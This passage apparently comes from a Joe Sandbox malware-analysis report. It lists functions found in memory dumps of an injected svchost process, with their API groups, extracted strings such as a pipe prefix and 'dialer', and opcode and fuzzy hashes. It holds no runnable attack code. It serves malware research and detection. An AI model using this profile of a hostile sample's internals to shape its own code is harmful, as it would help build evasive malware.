                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 47c5c9812b7ca215d1726492dddbe4c416650bb443fc8a163cb96cfe57a725b8
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: B7D17876248F8981DB709B1AE4943BA77E0F38CBC8F151166EA8D47BA9DF38C551CB00
                                                                          Function 000001F28C932F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                          Function 000001F28C93CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                          Function 000001F28C93199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                          Function 000001F28C9336C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                          Function 000001F28C938FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                          Function 000001F28C931A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                          Function 000001F28C933044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                          Function 000001F28C93BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                          Function 000001F28C9350D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 695498e749fc0dccb61c5851ea1446fca79afe24a4ea5175a6ebc953a781018c
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: FE02B536259BC586EB60CB65E4943BAB7E1F3C8794F145065FA8E87BA8DB7CC444CB00
                                                                          Function 000001F28C935710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: af79dd3a637af7051ac8258955ba177530c52f0ebe9781b5e5262fa2f630485f
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 9B61B736559E86C6E760CB25E4443BAB7E0F388BC4F5421A5FA8E47BA8DB7CC540CB00
                                                                          Function 000001F28C944104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 18dd3864b1be54540109cc27050939df0162b2e3d2136eb0ccd191d63ff6d6f5
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 4B117032AD0ED3A2F6685568E8563F911C16B7C3F8F18C6F4E976077E6CB38CA416201
                                                                          Function 000001F28C1E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: a4a41e1020a2a8b071d84c40f44e8a003d1d22f86d765e777ed5b7e6a37d2a97
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 101191B2AD0F1391FA641528E4C13F91BC16F593F4FC88639E966C73D68BB4C841C200
                                                                          Function 000001F28C939650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                          • Instruction ID: 7bb4e64f612b34c83592e40eb8d5e89f9ecd63dea6d765824e11e06b7d663cc9
                                                                          • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                          • Instruction Fuzzy Hash: 26116030786EC382FF549735A8843F922D5AB487E4F0D66B4D926077D9EB38C841C700
                                                                          Function 000001F28C1DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8ad1ea8264d7c37166e6a84d5d136f736317519dcbce977c15a2e7b39df90729
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 1B61C1766A0E4242FA699B69E5C43FE6EE1E7867C0F544539DB0B077A4DB34FA42C300
                                                                          Function 000001F28C93AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: f049bdfa4467cedf291596ae25218e3f591c75243dbf1769f2e4c86082fcfec4
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F8614737601A858AEB209FA5D8803FD77E1F344B98F089265EE4A57B99DB38C595C700
                                                                          Function 000001F28C93AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 9177f0bf0d9df7804a9a46984ee0add15a62b848f9b6fecfe92ace9b6ae30fc5
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 2B518F72140AC28AEB748BB59D843B977E0F354BE5F1CA265DA5947BD5CF38D860CB00
                                                                          Function 000001F28C1D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                          Function 000001F28C1D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                          Function 000001F28C942058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                          Function 000001F28C9314A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                          Function 000001F28C942980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: fc060a2a777751a54c3aac3ae4014f4932e9590c1f0470bfe82fe847ff4173f9
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: DD91CE72B50ED289FB64DF6594903FD3BE0B745BC8F1481A9DE0AA7A95DB34C482C700
                                                                          Function 000001F28C937960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 96732df7916216e4dd4de8696d19f0f646e57f72df42aa736ed25244752b7042
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: B0111872790F428AEB008B70E8543B833A4F719798F441E35DA6D477A4EB78D2988380
                                                                          Function 000001F28C93253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: a81e46be2f1358104ca60f674bf27db7b8eb3ba3bc6c3102e371a9ccd66cc1d5
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 1B719F36280FC286EB259F36A8483FA67D4F389BC4F582076DD0A53B9ADF35D6458700
                                                                          Function 000001F28C932330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: 2488fe1737ff95e66ad044885111441f0c3a749c14707708a82aa8e704c637ae
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: B551C072284FC381EB649A3AA4583FAA7D1F3857C0F4D61B5DE5903B9ADB39C6058740
                                                                          Function 000001F28C9426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 2514762f6e10ab6845feae25dddec55dde5b08df4a5e13f98591cf2ab0d60153
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 60418D72615E8186EB209F25E8443FAB7A0F798BD4F548171EE4E87798EB3CC541CB50
                                                                          Function 000001F28C9394A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: a1389ac8532826ac596aaee6b13d59646ba39f355e91e1ec56b6d169f0d5a3fa
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 61112832214FC182EB618F25E4443A9B7E5FB88B94F598264EE8C07B69DF3CC595CB00
                                                                          Function 000001F28C1D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 6f46bb36e99698124d87c0e4d324587b24abbfd4879edec8008199ce5951e68a
